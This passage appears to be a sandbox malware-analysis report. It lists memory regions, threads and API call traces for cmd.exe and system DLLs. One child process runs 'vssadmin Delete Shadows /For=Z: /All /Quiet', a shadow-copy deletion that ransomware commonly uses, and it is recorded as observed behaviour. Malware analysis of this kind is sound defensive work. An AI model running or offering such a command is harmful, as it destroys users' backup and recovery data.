	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcebf0000"
	        filename = ""

Region:
	              id = 586
	        start_va = 0x8bda350000
	          end_va = 0x8bda38ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008bda350000"
	        filename = ""

Region:
	              id = 587
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 588
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 589
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 594
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 595
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 596
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 597
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 598
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 614
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 642
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 643
	        start_va = 0x24dcd400000
	          end_va = 0x24dcd4affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd400000"
	        filename = ""

Region:
	              id = 672
	        start_va = 0x24dced20000
	          end_va = 0x24dcf056fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 673
	        start_va = 0x24dcd400000
	          end_va = 0x24dcd459fff
	       monitored = 1
	     entry_point = 0x24dcd4153f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 674
	        start_va = 0x24dcd460000
	          end_va = 0x24dcd480fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 675
	        start_va = 0x24dcd4a0000
	          end_va = 0x24dcd4affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd4a0000"
	        filename = ""

Region:
	              id = 723
	        start_va = 0x24dcf060000
	          end_va = 0x24dcf276fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcf060000"
	        filename = ""

Region:
	              id = 724
	        start_va = 0x24dcf280000
	          end_va = 0x24dcf493fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcf280000"
	        filename = ""

Region:
	              id = 744
	        start_va = 0x24dcebf0000
	          end_va = 0x24dced07fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcebf0000"
	        filename = ""

Region:
	              id = 745
	        start_va = 0x24dced10000
	          end_va = 0x24dced1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dced10000"
	        filename = ""

Region:
	              id = 746
	        start_va = 0x24dcf4a0000
	          end_va = 0x24dcf6bafff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcf4a0000"
	        filename = ""

Region:
	              id = 747
	        start_va = 0x24dcf6c0000
	          end_va = 0x24dcf7d7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcf6c0000"
	        filename = ""

Region:
	              id = 842
	        start_va = 0x8bda390000
	          end_va = 0x8bda3cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008bda390000"
	        filename = ""

Region:
	              id = 843
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 844
	        start_va = 0x24dcd400000
	          end_va = 0x24dcd400fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd400000"
	        filename = ""

Region:
	              id = 845
	        start_va = 0x24dcf7e0000
	          end_va = 0x24dcf89bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcf7e0000"
	        filename = ""

Region:
	              id = 846
	        start_va = 0x24dcd400000
	          end_va = 0x24dcd403fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd400000"
	        filename = ""

Region:
	              id = 847
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 877
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 878
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 879
	        start_va = 0x24dcd410000
	          end_va = 0x24dcd416fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024dcd410000"
	        filename = ""

Region:
	              id = 880
	        start_va = 0x24dcd420000
	          end_va = 0x24dcd420fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd420000"
	        filename = ""

Region:
	              id = 881
	        start_va = 0x24dcd430000
	          end_va = 0x24dcd430fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd430000"
	        filename = ""

Region:
	              id = 882
	        start_va = 0x24dcd440000
	          end_va = 0x24dcd444fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 883
	        start_va = 0x24dcd450000
	          end_va = 0x24dcd450fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 887
	        start_va = 0x24dcd460000
	          end_va = 0x24dcd461fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd460000"
	        filename = ""

Region:
	              id = 888
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 889
	        start_va = 0x24dcd470000
	          end_va = 0x24dcd470fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 890
	        start_va = 0x24dcd480000
	          end_va = 0x24dcd481fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024dcd480000"
	        filename = ""


Thread:
	id = 16
	os_tid = 0x12d4


Thread:
	id = 18
	os_tid = 0x12d0


Thread:
	id = 21
	os_tid = 0x122c


Thread:
	id = 35
	os_tid = 0xe50


Process:
	id = "6"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x40446000"
	os_pid = "0x12cc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=Z: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 547
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 548
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 549
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 550
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 551
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 552
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 553
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 554
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 555
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 556
	        start_va = 0x7f970000
	          end_va = 0x7f992fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f970000"
	        filename = ""

Region:
	              id = 557
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 558
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 559
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 560
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 561
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 562
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 563
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 564
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 565
	        start_va = 0x1c0000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 566
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 567
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 568
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 579
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 580
	        start_va = 0x4600000
	          end_va = 0x473ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 581
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 590
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 591
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 592
	        start_va = 0x7f870000
	          end_va = 0x7f96ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f870000"
	        filename = ""

Region:
	              id = 1178
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1179
	        start_va = 0x2b0000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002b0000"
	        filename = ""

Region:
	              id = 1180
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1181
	        start_va = 0x4350000
	          end_va = 0x438ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1182
	        start_va = 0x4740000
	          end_va = 0x483ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004740000"
	        filename = ""

Region:
	              id = 1183
	        start_va = 0x4840000
	          end_va = 0x493ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004840000"
	        filename = ""

Region:
	              id = 1193
	        start_va = 0x4390000
	          end_va = 0x4393fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004390000"
	        filename = ""

Region:
	              id = 1454
	        start_va = 0x43a0000
	          end_va = 0x43a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000043a0000"
	        filename = ""

Region:
	              id = 1546
	        start_va = 0x4940000
	          end_va = 0x4c76fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 19
	os_tid = 0x12c8

	[0235.933] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0235.933] GetProcessHeap () returned 0x4640000
	[0235.933] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x400a) returned 0x464b998
	[0235.933] GetProcessHeap () returned 0x4640000
	[0235.934] RtlFreeHeap (HeapHandle=0x4640000, Flags=0x0, BaseAddress=0x464b998) returned 1
	[0235.936] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0235.936] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0235.936] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0235.936] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0235.936] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0235.936] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0235.936] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0235.937] GetProcessHeap () returned 0x4640000
	[0235.937] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x58) returned 0x4649048
	[0235.937] GetProcessHeap () returned 0x4640000
	[0235.937] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x1a) returned 0x4647318
	[0235.939] GetProcessHeap () returned 0x4640000
	[0235.939] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x52) returned 0x46490a8
	[0235.941] GetConsoleTitleW (in: lpConsoleTitle=0x18f650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0236.353] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0236.353] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0236.353] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0236.353] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0236.353] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0236.353] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0236.353] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0236.354] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0236.355] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0236.356] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0236.357] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0236.358] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0236.359] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0236.359] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0236.359] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0236.360] GetProcessHeap () returned 0x4640000
	[0236.360] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x210) returned 0x4649108
	[0236.360] GetProcessHeap () returned 0x4640000
	[0236.360] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x64) returned 0x4649320
	[0236.360] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0236.361] GetProcessHeap () returned 0x4640000
	[0236.361] RtlAllocateHeap (HeapHandle=0x4640000, Flags=0x8, Size=0x418) returned 0x46405c8
	[0236.361] SetErrorMode (uMode=0x0) returned 0x0
	[0236.362] SetErrorMode (uMode=0x1) returned 0x0
	[0236.362] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46405d0, lpFilePart=0x18f15c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f15c*="Desktop") returned 0x1d
	[0236.362] SetErrorMode (uMode=0x0) returned 0x1
	[0236.362] GetProcessHeap () returned 0x4640000
	[0236.362] RtlReAllocateHeap (Heap=0x4640000, Flags=0x0, Ptr=0x46405c8, Size=0x56) returned 0x46405c8
	[0236.362] GetProcessHeap () returned 0x4640000
